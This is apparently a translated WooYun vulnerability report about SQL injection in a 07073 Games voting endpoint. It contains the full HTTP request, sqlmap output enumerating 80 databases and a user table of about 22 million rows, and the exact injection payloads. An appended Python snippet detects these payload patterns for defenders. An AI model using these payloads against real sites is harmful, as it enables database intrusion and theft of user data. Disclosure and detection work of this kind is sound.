Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0102150

Title: SQL injection in a 07073 Games site, for the third time, affects user data

Vendor: 07073.com

Author: BMa

Submitted: 2015-03-18 16:23

Fixed: 2015-05-02 16:26

Published: 2015-05-02 16:26

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or assistance, contact [email protected]


Vulnerability details

Disclosure status:

2015-03-18: Details sent to the vendor, awaiting vendor handling
2015-03-18: Vendor confirmed; details disclosed to the vendor only
2015-03-28: Details disclosed to core white hats and relevant domain experts
2015-04-07: Details disclosed to regular white hats
2015-04-17: Details disclosed to intern white hats
2015-05-02: Details disclosed to the public

Brief description:

SQL injection in a 07073 Games site, for the third time, affects the data of 22042115 users.
Whether they know me or not, everyone knows I never dump people's databases for no reason. Your user base is growing pretty fast, by the way.
No slow time-based extraction needed this time; this time it was fast.

Detailed description:

xin.07073.com


POST /plus/xinyou/dbvote.php HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36 Netsparker
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://xin.07073.com
Referer: http://xin.07073.com/jingsu/1070711.html
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: xin.07073.com
Cookie: Vote_83=83; Vote_82=82; Vote_78=78; Vote_80=80; Vote_81=81; DEDE_VOTENAME_AAA_83=1; DEDE_VOTENAME_AAA_82=1; DEDE_VOTENAME_AAA_78=1; DEDE_VOTENAME_AAA_80=1; DEDE_VOTENAME_AAA_81=1; CNZZDATA30095910=cnzz_eid%3D1437763485-1426487774-http%253A%252F%252Fwww.07073.com%252F%26ntime%3D1426660667; CNZZDATA30078424=cnzz_eid%3D1529681690-1426490357-http%253A%252F%252Fwww.07073.com%252F%26ntime%3D1426658832; DedeUserID=22166706; DedeUserID__ckMd5=195d5f4d055945af; DedeUsername=bma123; DedeUsername__ckMd5=ed597bcceffae423; loginState=1; loginName=bma123; www07073=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22dd2dc1c1fda7746aa70125029bbfeecb%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%22183.57.47.59%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A72%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%3B+rv%3A36.0%29+Gecko%2F20100101+Firefox%2F36.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1426664118%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7Dd671b910f5f2639f02ce1cc826b1db3f; PHPSESSID=c1d84f440efc45df68df03edd0d78e01; TosoDiggID4464fee0fec20fd7f58de87f7ee96950=1; TosoDiggID4464fee0fec20fd7f58de87f7ee96950__ckMd5=bfee8899ae6851e8; TosoDiggIDb6dd734d69aa9f7266b5678c8db1743e=1; TosoDiggIDb6dd734d69aa9f7266b5678c8db1743e__ckMd5=bfee8899ae6851e8; TosoDiggIDf2872b5d007c756a3288e2f29c27768d=1; TosoDiggIDf2872b5d007c756a3288e2f29c27768d__ckMd5=bfee8899ae6851e8; TosoDiggID96291ddc67d0dae5771856131730259b=1; TosoDiggID96291ddc67d0dae5771856131730259b__ckMd5=bfee8899ae6851e8; TosoDiggID541fb77c001f812da4d251f8d42f3b5b=1; TosoDiggID541fb77c001f812da4d251f8d42f3b5b__ckMd5=bfee8899ae6851e8; TosoDiggIDc723360b1b1a6624c0bda36a46423d6a=1; TosoDiggIDc723360b1b1a6624c0bda36a46423d6a__ckMd5=bfee8899ae6851e8; TosoDiggID2c44d13d392d469bac2f65280f4a639e=1; TosoDiggID2c44d13d392d469bac2f65280f4a639e__ckMd5=bfee8899ae6851e8; TosoDiggIDff3af9de5ce2074c0effe3a95a0e655e=1; TosoDiggIDff3af9de5ce2074c0effe3a95a0e655e__ckMd5=bfee8899ae6851e8; TosoDiggID9a9f466501dd2527465077bcf0896ce0=1; TosoDiggID9a9f466501dd2527465077bcf0896ce0__ckMd5=bfee8899ae6851e8; TosoDiggIDc04cab8cdd56aacf2bf1d3b4bd883933=1; TosoDiggIDc04cab8cdd56aacf2bf1d3b4bd883933__ckMd5=bfee8899ae6851e8
Accept-Encoding: gzip, deflate
Content-Length: 167
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
ty=left&field=1&aid=1070711


Parameter: field

(Screenshots 1.jpg to 5.jpg omitted)


field
[16:10:11] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[16:10:11] [INFO] fetching current user
[16:10:11] [INFO] retrieved: amdbuser@%
current user: 'amdbuser@%'
available databases [80]:
[*] 123_07073
[*] acg073
[*] adv07073
[*] advertising
[*] android07073
[*] askdata
[*] atlas07073
[*] baidu_xml_dev
[*] baobei
[*] bar07073
[*] bbs073
[*] bl07073
[*] box07073
[*] cache07073
[*] cartoon
[*] coderead
[*] comment
[*] datacenter
[*] db07073
[*] db07073_tx2
[*] db07073qn
[*] dbcache
[*] discuz
[*] dn07073
[*] dnf07073
[*] downloads
[*] duandi
[*] fahao073
[*] fahao10
[*] flash07073
[*] giftcode
[*] hdtemplates
[*] hi07073
[*] huodong
[*] information_schema
[*] iphonewy_x15
[*] iphonewy_x20
[*] jft073
[*] kaifuopen_hzhks
[*] kaifuopen_zjgtqxx
[*] kc07073
[*] kf07073
[*] kf07073b
[*] kf207073
[*] kf521
[*] kf77745
[*] list07073
[*] mesearch
[*] mh073
[*] mobilenews
[*] molihai073
[*] monitor
[*] mysql
[*] nycc
[*] other_website
[*] paihang07073
[*] performance_schema
[*] shop073
[*] sy07073
[*] team07073
[*] tieba
[*] tongji
[*] top2011
[*] tweibo
[*] ui073
[*] wap07073
[*] webbox
[*] weixin073
[*] wenwen073
[*] wow07073
[*] www.13cr.com
[*] www07073
[*] www07073bak
[*] xuan-astd
[*] xweibo
[*] youxi
[*] yxdata
[*] zhuanchu
[*] zhuanchu2
[*] zt07073
sts:
---
Parameter: field (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ty=left&field=1 AND 1811=1811&aid=1070711
Type: inline query
Title: MySQL inline queries
Payload: ty=left&field=(SELECT CONCAT(0x7171787171,(SELECT (ELT(3754=3754,1))),0x7178786a71))&aid=1070711
---
[16:12:15] [INFO] testing MySQL
[16:12:15] [INFO] confirming MySQL
[16:12:15] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[16:12:15] [INFO] retrieved: 22042115
Database: bbs073
+------------+----------+
| Table      | Entries  |
+------------+----------+
| uc_members | 22042115 |
+------------+----------+
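A defender-side check added here as an example; it is not part of the original report and not the site's own code. It parses constructed POST bodies for the /plus/xinyou/dbvote.php endpoint and flags the two payload shapes sqlmap reported for the `field` parameter (a boolean tautology and an inline CONCAT/ELT subquery), plus any non-integer value where the endpoint expects a numeric id. The sample bodies are constructed from the report, and the signature labels are this example's own.

```python
import re
from urllib.parse import parse_qs

# Constructed sample POST bodies for /plus/xinyou/dbvote.php, modelled on the
# report (the benign body and the two sqlmap payload shapes). Not real traffic.
SAMPLE_BODIES = [
    "ty=left&field=1&aid=1070711",                 # normal vote
    "ty=left&field=1 AND 1811=1811&aid=1070711",   # boolean-based blind probe
    "ty=left&field=(SELECT CONCAT(0x7171787171,(SELECT (ELT(3754=3754,1))),"
    "0x7178786a71))&aid=1070711",                  # inline-query probe
    "ty=right&field=2&aid=1070712",                # another normal vote
]

# Assumption from the report: dbvote.php uses field and aid as numeric ids, so
# a non-integer value is already a finding before any signature matches.
INT_PARAMS = ("field", "aid")

# Signature names are this example's own labels, not sqlmap's.
SIGNATURES = {
    # "AND 1811=1811": boolean tautology comparing a number with itself
    "boolean_tautology": re.compile(r"\b(AND|OR)\s+(\d+)\s*=\s*\2\b", re.I),
    # "(SELECT CONCAT(0x..., (SELECT (ELT(...": nested subquery with string builders
    "inline_subquery": re.compile(r"\(\s*SELECT\b.*\b(CONCAT|ELT)\s*\(", re.I),
    # long hex literals used as delimiters around extracted values
    "hex_literal": re.compile(r"0x[0-9a-f]{6,}", re.I),
}


def classify_body(body):
    """Return (param, reason) findings for one urlencoded POST body.

    parse_qs percent-decodes values, so "1%20AND%201%3D1" is examined as
    "1 AND 1=1" and still matched.
    """
    findings = []
    params = parse_qs(body, keep_blank_values=True)
    for name in INT_PARAMS:
        for value in params.get(name, []):
            if not value.isdigit():
                findings.append((name, "non_integer"))
            for label, pattern in SIGNATURES.items():
                if pattern.search(value):
                    findings.append((name, label))
    return findings


def scan(bodies):
    """Map each body to its findings; an empty list means nothing was flagged."""
    return {body: classify_body(body) for body in bodies}


if __name__ == "__main__":
    for body, hits in scan(SAMPLE_BODIES).items():
        print("ALERT" if hits else "ok   ", hits, body[:60])
```

The `non_integer` check is the durable part: an allowlist on the expected type catches payload variants the signatures miss, which is also what a fix inside dbvote.php should enforce before the value reaches the query.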

Proof of vulnerability:

Fix recommendation:

Copyright notice: when reposting, please credit the source BMa@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2015-03-18 16:25

Vendor reply:

Thank you for the vulnerability information.

Latest status:

None yet